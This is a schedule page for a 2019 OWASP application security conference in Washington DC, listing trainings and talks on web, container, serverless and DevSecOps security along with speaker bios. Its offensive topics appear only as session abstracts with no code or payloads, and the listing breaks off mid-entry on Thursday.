Registration is NOW Open
Marriott Wardman Park
2660 Woodley Rd NW
Washington DC, District of Columbia 20008 USA
Phone: 1-202-328-2000 

*discount rates expire August 19, 2019


Monday, September 9
 

8:00am

Registration
Monday September 9, 2019 8:00am - 5:00pm
Atrium

9:00am

A Builder’s Guide to Single Page Application Security
Whether you like it or not, we all live in a world of Single Page Applications. Frontend JavaScript frameworks such as Angular and React have changed the way we build web applications. However, did you know that these frameworks also disrupt the security landscape? For example, Angular and React change the nature of XSS as we know it. They also conflict with modern security measures, such as Content Security Policy.
In this training, you will learn how to build secure Single Page Applications. We cover changes in the security model of an application, common threats to an application, framework features that increase security, and state-of-the-art security technology you should start using. Concretely, we will cover the following topics:
  • XSS in Angular and React
  • Advanced injection attacks
  • The limitations of CSP in Single Page Applications
  • Recent developments in CSP
  • Protecting yourself against malicious third-party content
  • JWT abuse and best practices
  • The intricacies of Cross-Origin Resource Sharing
  • Recent developments in using OAuth 2.0 and OpenID Connect
The training consists of both lectures and hands-on lab sessions. Lectures go into depth on security threats and mitigation strategies. Labs are conducted in a custom-built competitive lab environment. Security challenges give you hands-on experience with attacks and defenses. You will walk away from this training with an overview of current best practices, along with actionable advice on implementing them.


Speakers
Philippe De Ryck

Founder, Pragmatic Web Security
Philippe De Ryck helps developers protect companies through better web security. As the founder of Pragmatic Web Security, he travels the world to train developers on web security and security engineering. His Ph.D. in web security from KU Leuven forms the basis of his exceptional...


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 3

9:00am

Attacking and Defending Containerized Apps and Serverless Tech
Container and serverless technology have changed the way applications are developed and the way deployments are done. Organizations, both large and small, have openly embraced containerization to supplement traditional deployment paradigms like Virtual Machines and Hypervisors.
Containers have risen in popularity and are widely used because they help package and deploy consistent-state applications across multiple environments, and they are also extremely scalable, especially when complemented with orchestration technologies.
Serverless, on the other hand, seems to be taking over at a rapid rate with increased usage of microservices and polyglot development of applications and services across organizations.
However, security remains a key challenge that both organizations and security practitioners face with containerized and serverless deployments. While containers continue to be vulnerable to the security threats that plague any typical application deployment, they also face specific threats related to the containerization daemon, the shared kernel and other shared resources like the network, processes and the filesystem. Serverless deployments face risks such as insecure deployment configurations, inadequate monitoring and logging of functions, broken authentication, function event data injection, insecure secret storage, and many more.
Attacking services and applications that leverage container and serverless technology requires a specific skill set and a deep understanding of their underlying architecture.
This training has been created with the objective of understanding both offensive and defensive security for container-orchestrated and serverless deployments. It is a 2-day program that works through specific theory elements with extensive hands-on exercises modelled on real-world threat scenarios. Attendees will understand the ways in which containerized and serverless deployments can be attacked, and how they can be made secure while remaining scalable, efficient and effective.

The training consists of, but is not limited to, the following focus areas in Container Security and Serverless Deployment:
  • Introduction to Container Technology
  • Containerized Deployments and Container Orchestration Technologies
  • Container Threat-Model
  • Attacking Containers and Security deep-dive
  • Introduction to Kubernetes
  • Threat-Model of Orchestration technologies
  • Attacking Kubernetes
  • Kubernetes Defense-in-Depth
  • Logging & Monitoring Orchestrated deployments
  • Introduction to Serverless
  • Deploying Application to AWS Lambda
  • Serverless Threat-Model
  • Attacking a Serverless Stack
  • Serverless Security Deep-dive

Speakers
Sudarshan Narayanan

Practice Head - DevSecOps, we45
Sudarshan Narayanan is the Practice Head of DevSecOps at we45, a focused application security company. Sudarshan currently leads the service delivery practice at we45 and comes with a decade-long experience in Software Quality Assurance. Sudarshan's primary focus involves conceptualizing...
Nithin Jois

Senior Security Solutions Engineer, we45
Nithin Jois is a Solutions Engineer at we45, a focused Application Security company. He has helped build Orchestron, a leading Application Vulnerability Correlation and Orchestration Framework. He is experienced in orchestrating containerized deployments securely to Production...
Tilak Thimmappa

Senior Solution Engineer, we45
I work at an Application Security company (we45) and have a unique perspective of developing secure and deliberately insecure apps in Python and NodeJS. I have contributed to the development of several Web-Applications using Django, Django-Rest-Framework, NodeJs and more, that have...


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 2

9:00am

Seth & Ken’s Excellent Adventures in Secure Code Review
Have you ever been tasked with reviewing 3.2 million lines of code manually for SQL Injection, XSS, and Access Control flaws? Have you been asked to review a new framework on short notice? Does the idea of reviewing Ruby, Go, or Node code leave you with heartburn? This course addresses all of these common challenges in modern code review. We have concentrated on taking our past adventures in code review and the lessons we have learned along the way, and making them applicable for others who perform code reviews. We will share our methodology for analyzing any source code and sussing out security flaws, no matter the size of the code base, the framework, or the language. As a student you will learn the methodology, techniques, approach, and tools used by Seth Law and Ken Johnson to understand code flows, trace user input, identify vulnerabilities, and effectively secure an application codebase.

Upon completion attendees will know:
Students will take away knowledge and experience in approaching numerous code languages and frameworks to complete a security source code review. In addition, the learned methodology can be customized by the attendee to fit into any organization’s security SDLC. Finally, the attendee will have the tools to review source code for any web, mobile, or modern application, whether or not the targeted language is specifically covered during the course.


Speakers
Seth Law

President and Principal Security Consultant, Redpoint Security
Seth Law is the President and Principal Security Consultant of Redpoint Security (rdpt.io). During the last 15 years, Seth has worked within multiple disciplines, from software development to network protection, as a manager and individual contributor. Seth has honed his application...
Ken Johnson

AppSec Person, GitHub
Ken Johnson has been hacking web applications professionally for 11 years. Ken is both a breaker and a builder and currently works on the GitHub application security team. Previously, Ken has spoken at RSA, You Sh0t the Sheriff, Insomnihack, CERN, DerbyCon, AppSec USA, AppSec DC, AppSec...


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 5

9:00am

Using the OWASP Application Security Verification Standard 4.0 to Secure Your Applications
This three-day master class delivered by the three co-leaders of the project covers essential developer-centric security architecture and controls using the newly released OWASP Application Security Verification Standard 4.0.
Instead of a blow-by-blow, control-by-control description of the standard, we take students on a journey of discovery of the major issues using an interactive, lab-driven class structure. We strongly urge attendees to bring some code to follow along, or to use the sample app we will have on hand. Students should feel free to ask questions at any time to delve deeper into the things they really need to know to push their knowledge to the next level.
The course is primarily aimed at assisting developers to produce more secure applications, but anyone in the secure software delivery lifecycle should come - including architects, tech leads, developers, testers, and of course application security professionals.


Speakers
Andrew van der Stock

Senior Principal Consultant, Synopsys
Andrew van der Stock is a long-time security researcher, the current co-lead of the OWASP Top 10 and OWASP Application Security Verification Standard, and a former OWASP Global Board member. Andrew has trained or spoken at many conferences worldwide, including Black Hat...


Monday September 9, 2019 9:00am - Wednesday September 11, 2019 5:00pm
Lincoln 6

10:00am

AM Coffee Break
Monday September 9, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Monday September 9, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Monday September 9, 2019 3:00pm - 3:30pm
Exhibit Hall C
 
Tuesday, September 10
 

8:00am

Registration
Tuesday September 10, 2019 8:00am - 5:00pm
Atrium

9:00am

Secure Coding with the OWASP Top Ten
The major cause of API and web application insecurity is insecure software development practices. This highly intensive and interactive 2-day course provides essential application security training for web application and API developers and architects.
The class is a combination of lecture, security testing demonstration and code review. Students will learn the most common threats against applications. More importantly, students will learn how to code secure web solutions via defense-based code samples.
As part of this course, we will explore the use of third-party security libraries and frameworks to speed up and standardize secure development. We will highlight production-quality and scalable controls from various languages and frameworks. This course will include secure coding information for Java, PHP, Python, JavaScript, and .NET programmers, but any software developer building web applications and APIs will benefit.

Student Requirements: Familiarity with the technical details of building web applications and APIs from a software engineering point of view.
Laptop Requirements: Any laptop that can run an updated web browser and intercepting proxy tool.

Day 1 of the course will focus on web application basics.
  • Introduction to Application Security
  • Introduction to Security Goals and Threats
  • HTTP Security Basics
  • CORS and HTML5 Considerations
  • XSS Defense
  • Content Security Policy
  • Intro to Angular.JS Security
  • Intro to React.JS Security
  • SQL and other Injection
  • Cross-Site Request Forgery
  • File Upload and File IO Security
  • Deserialization Security
  • Input Validation Basics
  • OWASP Top Ten 2017
  • OWASP ASVS 4.0

Day 2 of the course will focus on API secure coding, Identity, and other advanced topics.
  • Webservice, Microservice and REST Security
  • Authentication and Session Management
  • Access Control Design
  • OAuth 2 Security
  • OpenID Connect Security
  • HTTPS/TLS Best Practices
  • 3rd Party Library Security Management
  • Application Layer Intrusion Detection
  • Secure SDLC
We end day 2 with a competitive hacking lab and secure coding lab. It's a fun and informative way to end the course.

Please note this course will cover the requested DC conference topics:
  • Novel web vulnerabilities and countermeasures
  • New technologies, paradigms, tools
  • OWASP tools or projects in practice
  • Secure development: frameworks, best practices, secure coding, methods, processes, SDLC
  • Browser security
  • REST/SOAP security
  • Security of frameworks
  • Effects of UX on security
  • Management topics in Application Security: Business Risks, Managing SDLC


Speakers
Jim Manico

Founder, Manicode Security
Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. He is also an investor/advisor for KSOC, Nucleus Security, Signal Sciences and BitDiscovery. Jim is a frequent speaker on secure software practices, is a member...


Tuesday September 10, 2019 9:00am - Wednesday September 11, 2019 5:00pm
Lincoln 4

10:00am

AM Coffee Break
Tuesday September 10, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Tuesday September 10, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Tuesday September 10, 2019 3:00pm - 3:30pm
Exhibit Hall C
 
Wednesday, September 11
 

9:00am

Registration
Wednesday September 11, 2019 9:00am - 9:15am
Atrium

9:00am

Project Review

Wednesday September 11, 2019 9:00am - 5:00pm
Buchanan

9:00am

Building an AppSec Program with OWASP
Explore the OWASP universe and how to build an application security program with a budget of $0. Experience a practitioner's guide for how to take the most famous OWASP projects and meld them together into a working program. Projects are broken down into awareness/process/tools, with an explanation of the human resources required to make this successful.
This course is a one-day training where there is a mixture of a lecture on a specific segment of OWASP projects, and then a practical exercise for how to use that project as a component of an application security program.
The first group of projects is "training/education". These projects focus on high-level knowledge, methodology, and training for the application security program. This group includes OWASP Top 10, OWASP Proactive Controls, cheat sheets, and training apps (Juice Shop, DevSlop, and WebGoat). Discussions focus on the process of raising awareness with knowledge/training and building out a program. The practical portion includes discussion of rolling out proactive controls and hands-on time with JuiceShop.
The second group is "process/measurement". These focus on requirements, code review, best practices, development libraries, and building software without known vulnerabilities. This group includes ASVS, SAMM, threat modeling, Code Review guide, and the testing guide. The end-to-end world of the developer is explored, from requirements through writing code. The working portion includes using ASVS to assess a sample app, threat modeling a sample app, and using SAMM for a sample assessment.
The third group is "tools". This group focuses on tools, including the testing guide, Dependency-Check, Threat Dragon, CRS, and ZAP. The testing approach and touchpoints are discussed, as well as a high-level survey of the tools. The working portion includes using ZAP to scan a sample application.
All of these tools work together to form the basis of an application security program with a budget of $0 except for the people resources to implement. This class teaches the projects to use as well as how to use them, with practical, hands-on experience.

Audience: The audience for this session is two-fold. The first group is those that are interested in building an application security program using the various tools and documents available from OWASP. The second group is those that want to experience multiple OWASP tools and materials and use them in practical exercises.

Prerequisites: Participants should have a foundational understanding of application/product security.

Computer Setup: Bring a computer for executing the lab exercises. Participants should download the OWASP Proactive Controls, ASVS, SAMM, and ZAP.


Speakers
Security Journey

Security Journey
coming soon


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 3

9:00am

DevSecOps - Automating Security in DevOps
Modern enterprises are implementing the technical and cultural changes required to embrace the DevOps methodology. DevSecOps extends DevOps by introducing security early into the SDLC process, thereby minimizing security vulnerabilities and enhancing the software security posture. In this workshop, we will show how this can be achieved through a series of live demonstrations and practical examples using open source tools.
As part of this workshop attendees will receive a state-of-the-art DevSecOps tool-chest comprising various open-source tools and scripts to help DevOps engineers automate security within the CI/CD pipeline. While the workshop uses the Java/J2EE framework, it is language agnostic and similar tools can be used against other application development frameworks.
The workshop will also present various case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.

Why DevSecOps?
The DevSecOps process will help:
  • Create a security culture/mindset amongst the already integrated DevSecOps team.
  • Find and fix security bugs as early in the SDLC as possible.
  • Promote the philosophy “security is everyone's problem.”
  • Integrate all security software centrally and utilize the results more effectively.
  • Measure and shrink the attack surface.

Who Should Take this Course
The DevSecOps Workshop gives the target audience a holistic approach to assessing and securing web applications in an automated fashion within the existing CI/CD pipeline. It can be attended by DevOps engineers, security and solutions architects, system administrators and anybody who is willing to inject security aspects into their DevOps process.

Student Requirements

Our workshop will be delivered as an interactive session, so the attendees only need to carry a laptop with them. We also encourage the attendees to download and try the tools and techniques discussed during the workshop as the instructor is demonstrating it.

What Students Should Bring
A laptop with Wi-Fi connectivity and admin privileges.

Students will be provided with
The attendees will also receive a free DevSecOps tool-chest (designed by the NotSoSecure team) which can be directly implemented in most CI/CD pipelines.


Speakers
Sumit Siddharth

Founder, NotSoSecure
Sumit Siddharth (Sid) is the founder of NotSoSecure (www.notsosecure.com), a specialist IT security firm delivering high-end IT security consultancy and training. Prior to NotSoSecure, he worked as Head of Penetration Testing for a leading IT security company in the UK. He has more than 9 years of experience in Penetration Testing. Sid has authored a...
Rohit Salecha

Principal Security Consultant, NotSoSecure
Rohit is a technology enthusiast with over 8 years of experience in hacking anything that runs on binaries and is on the ground. He also delivers one of the bestselling classes by NotSoSecure, titled ‘Application Security for Developers’. He has also trained and spoken at premier...


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 2

9:00am

Women In AppSec - Web Application Penetration Training (No charge)

This will be a 1-day training course. The Application Security Training is intended for students/professionals interested in making a career in the Information Security domain. This training involves real-world scenarios that every Security Professional must be well versed in. It involves decompiling, real-time analyzing and testing of applications from a security standpoint.
This training covers understanding the internals of web and mobile applications, real-time testing of web applications and Android applications, and a strategic approach to analyzing applications for OWASP Top 10 (Web) security issues such as injections, Cross-Site Scripting (XSS), CSRF attacks, insecure APIs, insecure logging, insecure communication, insufficient cryptography, insecure authentication, poor code quality and many more.
Zoe Braterman - Assistant Trainer

Speakers
Nicole Becher

Director of Information Security & Risk Management, S&P Global Platts
Nicole Becher is currently Director of Information Security & Risk Management for S&P Global Platts. She has been in the cybersecurity space for over ten years, working mostly in offensive security capacities leading penetration testers, red teams, forensics, and incident responders...
Vandana Verma

Security Architect, IBM India Software Labs
Vandana is a seasoned security professional with over a decade worth of experience ranging from application security to infrastructure and now dealing with cloud security. She works with various communities (InfosecGirls, OWASP, WoSec, and null) and is passionate about increasing...


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 5

10:00am

AM Coffee Break
Wednesday September 11, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Wednesday September 11, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Wednesday September 11, 2019 3:00pm - 3:30pm
Exhibit Hall C

5:00pm

Welcome Reception
Wear your badge to the receptions.

Wednesday September 11, 2019 5:00pm - 6:15pm
Exhibit C

 
Thursday, September 12
 

7:30am

Registration
Thursday September 12, 2019 7:30am - 5:00pm
Atrium

8:00am

Capture the Flag - CMD+CTRL Web Application Cyber Range
Want to test your skills in identifying web app vulnerabilities? Join OWASP and Security Innovation as attendees compete in CMD+CTRL, a web application cyber range where players exploit their way through hundreds of vulnerabilities that lurk in business applications today. Success means learning quickly that attack and defense are all about thinking on your feet.
For each vulnerability you uncover, you are awarded points. Climb the interactive leaderboard for a chance to win fantastic prizes! CMD+CTRL is ideal for development teams to train and develop skills, but anyone involved in keeping your organization’s data secure can play, from developers to managers and even CISOs.
Register early to reserve your spot!
https://web.securityinnovation.com/owaspdc2019

Speakers
Kevin Poniatowski

Senior Security Instructor and Engineer, Security Innovation
Kevin Poniatowski, Senior Security Instructor and Engineer at Security Innovation, brings an optimal blend of speaking ability, technical savvy, and an insatiable passion for security to Security Innovation's training customers. This produces an engaging and enlightening environment...


Thursday September 12, 2019 8:00am - 5:15pm
Virginia B

8:45am

Opening Remarks
Thursday September 12, 2019 8:45am - 9:00am
Salon 2

9:00am

Applying Security Engineering Principles to Complex Composite Systems
Modern web applications and systems have grown increasingly complex in the 18 years since OWASP was founded. Today's systems are composed from many diverse components, employ a wide variety of frameworks and toolkits, and utilize a vast spectrum of hosting models and external services. Secure design and operation for such composite systems requires thoughtful application of security engineering principles, attention to interactions among composite system elements, and awareness of dependencies across the system lifecycle. This talk will cover a selection of high-level principles and illustrate them with reference to a Smart City transit system example.

Speakers
Neal Ziring

Technical Director for the National Security Agency’s Capabilities Directorate, NSA
Mr. Neal Ziring is the Technical Director for the National Security Agency’s Capabilities Directorate, serving as a technical advisor to the Capabilities Director, Deputy Director, and other senior leadership. Mr. Ziring is responsible for setting the technical direction across...


Thursday September 12, 2019 9:00am - 10:00am
Salon 2

10:00am

AM Coffee Break
Thursday September 12, 2019 10:00am - 10:30am
Exhibit Hall C

10:00am

Members Lounge
Looking for a place to recharge your electronics?
Feeling a bit hungry or thirsty?
Maybe you are looking for some cool OWASP Member Only swag?
Or just looking to take a break from the hectic conference atmosphere?
Head on over to the Members Lounge located in the XXXX Room.

Here you can grab a snack, quench your thirst, recharge your electronics, kick up your feet, and network with other OWASP members all within a relaxed atmosphere.

Not an OWASP Member? No problem! Swing on over to the lounge, and you can sign up on the spot, or join here!

Look for the signs or ask a volunteer how to find us!

Thursday September 12, 2019 10:00am - 5:00pm
Atrium

10:30am

A Structured Code Audit Approach to Find Flaws in Highly Audited Webapps
WordPress is a highly popular content management system used by over 33% of all websites on the internet. Its ease of use, great compatibility with a variety of servers and its huge list of free and powerful plugins (over 50,000) make WordPress the first choice for quickly and easily setting up a website without any technical knowledge or excessive budget. WordPress can be customized and optimized to a point that even governments and billion-dollar corporations use this blogging CMS to manage their websites. From america.gov to the Swedish government, and from Microsoft to Facebook: they all use WordPress.

The popularity of this and other CMSs makes them an attractive target for cybercriminals seeking to take over as many websites as possible, as well as for nation states and other sophisticated hacking groups interested in backdooring high-value targets. We observed that the high interest in WordPress’ security by different groups led to many vulnerabilities being discovered and patched in the past. Additionally, bug bounty programs and 0day acquisition platforms attract a vast number of bounty hunters who have slowly but surely squeezed the easy-to-find vulnerabilities out of the WordPress core. Hence, the well-reviewed code of the most popular web application is a great challenge but also a good candidate for experimenting with different approaches to code auditing.

When we started our vulnerability research on the WordPress core code, we quickly realized that in order to find critical vulnerabilities one must move away from the traditional paradigm of finding simple vulnerabilities in web applications and come up with more effective approaches and methodologies for source code auditing. This paper documents our approach of separating source code into components and combining several low-impact bugs into powerful Privilege Escalation and Remote Code Execution exploits. We believe that our documentation of vulnerability discovery not only helps other researchers to manifest their audit methodology but also helps developers to better understand the mindset of attackers. As a result, we found and combined five vulnerabilities into a powerful exploit chain that in the end allowed unauthenticated attackers to take over any high-value target running WordPress.

Speakers
Simon Scannell

Security Researcher, RIPS Technologies


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 2

10:30am

Non-Political Security Learnings from the Mueller Report
The Mueller Report was split into 2 volumes, focused on 1) Russian interference in the 2016 election and 2) Administration obstruction of justice. By reading the report through a critical security lens we can gather a trove of non-political security learnings, broadly split into Blue Team learnings and Personal Security learnings.
Blue Team:
This portion covers the hacking of the DNC and DCCC. It examines the evidence in the report around how access was gained, which accounts were targeted, how networks were traversed, and what we can do to defend our organizations.
Personal Security:
This portion takes a data-driven approach to look at how the FBI gathered evidence. It examines the breakdown between different sources (Twitter/FB chats, emails, interviews, call records, written testimony, etc), as well as how that evidence was attained (subpoena, physical device access, etc). It covers both the Mueller Report and subsequent documents that have now been unsealed, such as Apple/Google subpoenas.

Speakers
Arkadiy Tetelman

Head of Security, Lob
Arkadiy Tetelman is Head of Security at Lob, and previously worked on application security at Airbnb and Twitter. He is passionate about all things information security, ranging from the technical, to policy and legal, to security management and leadership. He contributes to several...


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 3

10:30am

Security & Chaos Engineering: A Novel Approach to Crafting Secure and Resilient Distributed Systems
Security today is customarily a reactive and chaotic exercise.

Modern systems pose a number of thorny challenges, and securing the transformation from legacy monolithic systems to distributed systems demands a change in mindset and engineering toolkit. The security engineering toolkit is unfortunately out of style and outdated compared with today's approach to building, securing and operating distributed systems. Distributed systems at scale have unpredictable and complex outcomes that are costly when security incidents occur. The speed, scale, and complex operations within microservice architectures make it tremendously difficult for humans to mentally model their behavior.

What if you could flip a security incident scenario on its head and drive it in reverse? Chaos Engineering allows security teams to proactively experiment on recurring incident patterns to derive new information about underlying factors that were previously unknown, by reversing the postmortem and preparation phases. This is done by developing live-fire exercises that can be measured, managed, and automated. Unlike Red/Purple Team game days, chaos engineering does not use threat actor tactics, techniques, and procedures. It develops teams by building a learning culture around system failure, challenging engineering teams to discover new insights into how they can improve their applied security.

People operate differently when they expect things to fail. Additionally, teams are more likely to keep an open mind about what is actually causing those things to fail when they are not fighting fires. There is a fundamental shift in mental focus and operational momentum that drives teams to put the fire out rather than thoroughly examine what caused the incident to begin with. As far as we know, Chaos Engineering is the only proactive mechanism for detecting availability and security incidents before they happen. Security Chaos Engineering allows teams to proactively and safely discover system weaknesses before they disrupt business outcomes.

In this session, we will introduce a new concept known as Security Chaos Engineering and how it can be applied to create highly secure, performant, and resilient distributed systems.

Speakers

Aaron Rinehart

Founder, Verica
Aaron is most notably known for expanding the possibilities of Chaos Engineering in its application to other safety-critical portions of the IT domain, notably cybersecurity. He began pioneering the application of Security in Chaos Engineering during his tenure as the Chief Security...


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 6

10:30am

Securing Serverless by Breaking-in
Serverless rocks the security boat. Ad-hoc servers we don’t manage rid us of certain security concerns, while the proliferation of cheap microservices raises others. In this talk, we’ll experience these security concerns live. We’ll break into a vulnerable Serverless application and exploit multiple weaknesses, helping you better understand the mistakes you can make, their implications, and how you can avoid them.

Speakers

Hayley Denbraver

Developer Advocate, Snyk
Hayley Denbraver is a Developer Advocate at Snyk. In that role, she is committed to open source security education, listening to developer communities, and posting pictures of her dog on the company Slack.


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 4

10:30am

Secure Medical Device Deployment Standard
Speakers

Christopher Frenz

AVP of Information Security, Interfaith Medical Center
Christopher Frenz is the AVP of Information Security for Interfaith Medical Center, where he worked to develop the hospital’s information security program and infrastructure. Under his leadership, the hospital has been one of the first in the country to embrace a zero trust model...


Thursday September 12, 2019 10:30am - 11:15am
Virginia A

10:30am

Owning the Cloud through SSRF and PDF Generators
With so many apps running in the cloud, hacking these instances becomes easier when a simple vulnerability arises from unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfiltrate data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.

Behrouz Sadeghipour

Speakers

Ben Sadeghipour

Head of Hacker Operations, HackerOne
Ben is the head of Hacker Operations at HackerOne by day, and a hacker by night. He has helped identify and exploit over 700 security vulnerabilities across 100s of web and mobile applications for companies such as Yahoo, Airbnb, Snapchat, The US Department of Defense, Yelp, and more...


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 5

11:30am

OWASP Find Security Bugs: The community static code analyzer
The Web application development lifecycle has numerous security activities. For developers, code review is a familiar recurring activity. To support Java developers, a project called "Find Security Bugs" (FSB) was started in 2012. It is an extension of the SpotBugs project, formerly known as FindBugs. FSB is a community static analysis tool which targets specific vulnerabilities. Over the years FSB has evolved from a limited tool into one with solid coverage of bug patterns. It is now used in many large corporations to support automation.

In this presentation, you will learn about its high-level internals and heuristics, and its potential integration into developers' IDEs and continuous integration environments.

A selection of vulnerabilities found by the tool in popular applications, including Spring and Struts, will be explained. For each of these vulnerabilities, we will review the description of the affected component, the issue reported by the tool, the method used to analyze the report, and an overview of the potential risks. Along the way you will learn a few tips on increasing your efficiency with the tool.

After observing some real-world vulnerabilities, we will conclude with lessons learned from maintaining this open-source project for close to 8 years. These will include some of the successes, but also the failures, of the development initiatives.

Speakers

Philippe Arteau

Security Researcher, GoSecure
Philippe is a security researcher working for GoSecure. His research is focused on Web application security. His past work experience includes pentesting, secure code review and software development. He is the author of the widely-used Java static analysis tool Find Security Bugs...


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 2

11:30am

Insider Threat Assessments: A methodology for improving insider threat deterrence and detection
Giving organizations a proactive, situational procedure to validate their insider threat program reduces gaps in coverage, limits tool or service misconfigurations, helps prevent system and model oversights, and provides real-world practice scenarios. Over the last decade, there has been an influx of tools, task forces, and end-to-end solutions created to supplement insider threat programs. "An effective insider threat program incorporates a number of technical controls to assist with preventing, detecting, and responding to concerning behaviors and activity" (Spooner et al, 2018). In that same white paper, the authors also indicate that organizations, at a minimum, should adopt tools from each of the following categories: user activity monitoring (UAM), data loss prevention (DLP), security information and event management (SIEM), analytics, and digital forensics. The breadth of functionality and the wide array of available tools pose a challenge to organizations looking to build or strengthen their insider threat program. Furthermore, a panacea for all insider threats does not exist, and methods must be adopted that are specific to organizational assets. This presentation builds on a review of the existing insider threat tool landscape and introduces a methodology to validate configurations and coverage through a situational insider threat assessment. Insider threat kill chains, how to simulate relevant risks, and how to quantify key asset identification will also be covered.



Speakers

Ben Stewart

Security Engineer, Security Innovation
Ben has grown his security skill-set through years of high profile, complex development projects, primarily in the Financial Services industry. Building and securing systems responsible for large, regulated money movements, enabling secure code review processes and pipelines, and...


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 3

11:30am

Shift left, shift right, or run security right through the middle?
With software security blunders making headlines and businesses under increasing pressure to deliver software faster, development and security teams have been tasked with devising a strategy to satisfy demands for both more secure software and more rapid application development. These combined forces have led to the emergence of DevSecOps, which represents a shift in IT culture to accommodate the growing need for both security and speed. However, security teams want to shift left, development teams want to shift right, and Ops teams want testing throughout all phases of the development cycle, in other words, continuous testing. This leaves us with a lot of options and little guidance. What’s the best approach?

This talk will examine how your organization can inject security testing at the right time, at the right depth, by using the right tools, by defining the right processes, and with the right people. In this way, you can achieve continuous testing rather than testing without a clear strategy in place.

Speakers

Meera Rao

Senior Principal Consultant, Synopsys, Inc
Ms. Meera Rao works as a Senior Principal Consultant and the Director of DevSecOps Practice at Synopsys, Inc. She has over 20 years of experience in software development organizations in a variety of roles, including Architect, Lead Developer, Project Manager, and Security Architect...


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 6

11:30am

Cryptocoin Miners vs Machine Learning
This talk will be a walkthrough of how I built a detection engine focused on finding cryptocoin miners within an AWS architecture. It utilizes AWS Flow Logs as the data source and multiple statistical analysis techniques for both massaging the data and performing the actual detection. AWS Flow Logs do not function as traditional per-packet 5-tuple captures. Instead, the data is aggregated over a 10-minute period, organized by unique IP address and port numbers. This presents a unique challenge for building a detection model, as you don't have detailed per-packet logs. The methodology itself follows an iterative design: look for a pattern, implement it in code, check for false positives. This is repeated until we have a sufficiently knowledgeable model capable of flagging cryptocoin mining traffic with a minimal false positive rate. The techniques discussed include cluster analysis via k-means and DBSCAN, convex hulls, linear regression analysis, nearest neighbor, and several other simple but very powerful statistical analysis techniques. The final implementation will be built on top of ELK, culminating in a turn-key release that owners can drop into their environments.

Speakers

Jonn Callahan

Jonn started his career working within the government sector, helping to start a program responsible for securing web applications run on government infrastructure. Looking to expand his experience beyond the .NET stack and the occasional Java app, he moved into the private sector...


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 4

11:30am

Secure Coding Dojo
The Secure Coding Dojo is a platform for delivering security training for developers. The platform is created for development organizations of all sizes: from university classrooms to large enterprises.

While open source web applications that teach software security concepts are not new, the Secure Coding Dojo is not another vulnerable website. It is a training platform which can be customized to integrate with vulnerable applications and other CTF challenges.

Join this session to see the Dojo in action and learn how it can revolutionize application security training in a development organization.

Here are some of the topics that will be covered:
- Open source project history and evolution
- Predefined training apps: Insecure.Inc, Hacker's Den, Security Code Review Master
- Deploying with Docker or building the environment from scratch
- Auth integrations with Slack, ADFS SAML and LDAP
- Extending and customizing the platform

Check out the project links:

https://github.com/trendmicro/SecureCodingDojo
https://www.owasp.org/index.php/OWASP_Secure_Coding_Dojo
https://hub.docker.com/u/securecodingdojo

Speakers

Paul Ionescu

Security Architect and R&D Security Leader, Trend Micro
Paul Ionescu is a Security Architect and R&D Security Leader at Trend Micro and also an OWASP Ottawa Chapter Co-Leader. Over the past decade, Paul has worked in various areas of software security. He was a developer for the AppScan application security testing suite, formed and led...


Thursday September 12, 2019 11:30am - 12:15pm
Virginia A

11:30am

DevSecOps: Essential Pipeline Tooling to Enable Continuous Security
As we embrace DevOps to optimize our Agility, we start pushing working code toward production releases more frequently. Gone are the days where we can have a disjoint, mysterious security team that works down the hall or on some other floor. Whether we are doing true "Continuous Deployment" straight to production or not, we no longer have time for slow, manual, late-lifecycle security assessments to determine if our code is going to put us on the front page of the newspaper (for the wrong reasons). What we need is a way to know that our code is secure enough to pass muster every day. What we need is confidence that our software can continue to defend itself. What we need is continuous security.

The DevSecOps movement is about exactly that: shifting security assessment left and integrating it into the daily and sprint-ly cycles that DevOps has made popular. It means finding those touchpoints in our continuous integration/continuous delivery (CI/CD) pipeline where security tools can be inserted and run continuously against the software changes as they are made. It means using static code analysis, dynamic security testing, secure composition analysis of third party components, and platform vulnerability scanning to look at all aspects of security every day. It means breaking builds and rejecting changes when developers introduce new security vulnerabilities.

In this talk, I present my successes and challenges with integrating security into DevOps pipelines to provide continuous assessment of security posture. I focus on my latest experiences building delivery pipelines for a containerized microservice-based project where we integrated a broad set of open source and commercial tools to gather and present security data.

Speakers

Richard Mills

DevOps Solution Architect, Coveros, Inc.
Richard Mills has more than 25 years of experience in software engineering with a concentration on pragmatic software process and tools. Rich has a specific focus in Agile development methods and is passionate about DevOps, Continuous Integration, and Continuous Delivery. As a DevOps...


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 5

12:30pm

Lunch
Thursday September 12, 2019 12:30pm - 2:00pm
Exhibit Hall C

2:00pm

Making a Change, One at a time - Diversity: More than just Gender
